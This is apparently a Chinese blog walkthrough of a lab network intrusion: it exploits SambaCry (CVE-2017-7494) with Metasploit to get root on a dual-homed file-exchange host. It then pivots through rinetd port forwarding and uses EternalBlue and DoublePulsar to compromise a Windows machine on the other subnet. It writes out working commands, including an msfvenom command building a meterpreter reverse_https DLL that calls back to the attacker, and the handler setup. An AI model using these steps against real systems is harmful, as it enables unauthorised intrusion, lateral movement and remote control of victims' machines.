Wannacry与SambaCry的综合利用

首先介绍一下网络环境，有两个内部网络，网段分别为10.0.0.0/24和192.168.0.0/24，10.0.0.0/24为内部不联网的网络，192.168.0.0/24为内部的联网的网络，不联网的网络中的主机是不能拷贝文件出来的，即只进不出（其实是通过360做限制的，安全模式下依然可以拷贝处文件），两个网络的文件交互通过一台主机来实现，这台主机的IP分别为10.0.0.9和192.168.0.12。

攻击机有两台：windows xp（10.0.0.38）和Kali Linux（10.0.0.3），攻击机在10.0.0.0/24网段

靶机1：10.0.0.9， 192.168.0.12

靶机2：192.168.0.26

我们以这个用于交换文件的机器（10.0.0.9）为跳板渗透到192.168.0.0/24网络，首先通过nmap对10.0.0.9进行一次smb的扫描：

nmap --script smb-enum-shares 10.0.0.9

结果如下图所示：

可以看到该主机的samba版本为Samba Server 4.4.4，该版本处于samba漏洞CVE-2017-7494之列，至于哪些版本含有该漏洞，哪些版本不含有该漏洞，这个问题网上一搜便知，这里就不多言了。还有一点注意的是，path的值是c:\home\share\outer，这是SambaCry漏洞利用的条件之一。

然后启动Kali系统，因为我的postfresql服务不是自动启动的，所以这里要先手动启动postgresql服务：

root@kali:~# service postgresql start

然后启动msf，如下图所示：

网上关于如何利用SambaCry的文章也不少，主要就是使用is_known_pipename这个module，我的kali系统经过更新后已经安装有该模块了，所以直接使用，如果没有该模块则需要从网上下载，放在/usr/share/metasploit-framework/modules/exploits/linux/samba，然后在msf中reload一下。

使用is_known_pipename:

设置RHOST目标机器IP地址，端口号为默认的445就不需要设置了，执行run运行：

等待结果，输入whoami，得到用户root

到这里10.0.0.9这台机器已经沦陷，然后添加自己的用户即可使用putty登录啦！

接下来开始攻击192.168.0.26机器了，稍微扫描一下即可判断这台机器的系统为windows，攻击工具便是我们为名遐迩的NSA的EternalBlue。

开启VMWare中的XP（10.0.0.38）（我的NSA部署在里面），但是我这个XP不在192.168.0.0/24网络里，怎么办呢？既然10.0.0.9已经归我所有，那就以他为跳板继续吧。

现在我们目标是用10.0.0.38去入侵192.168.0.26，思路就是做端口转发，上rinetd工具，直接上配置：

0.0.0.0 6666 192.168.0.26 445 ---rinetd.conf

0.0.0.0 4444 10.0.0.3 6666 --rinetd.conf2

启动rinetd： 

rinet -c /etc/rinetd.conf

rinet -c /etc/rinetd.conf2

看到没有，这里我们启动了2个rinetd，分别用于攻击和靶机回连。

首先要生成我们的回连模块：

msfvenom -p windows/x64/meterpreter/reverse_https -a x64 –platform windows -f dll LHOST=192.168.0.12 LPORT=4444 > bad9_3_.dll

拷贝bad9_3_.dll到XP中待用。

启动msf，开启回连监听模式：

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set lhost 10.0.0.3

set lport 6666

run

开始等候回连：

现在启动fb，可以先查看是否支持eternalblue漏洞，use smbtouch：

use eternalblue, 设置目标IP和端口号：

这里目标IP设置为10.0.0.9，端口设置为6666，数据包将通过10.0.0.9转发到192.168.0.26上，实现入侵攻击。

攻击成功：

开始上注入回连模块：

use Doublepulsar

根据提示设置相关参数。

最后显示成功：

成功后，我们将在msf中看到连接成功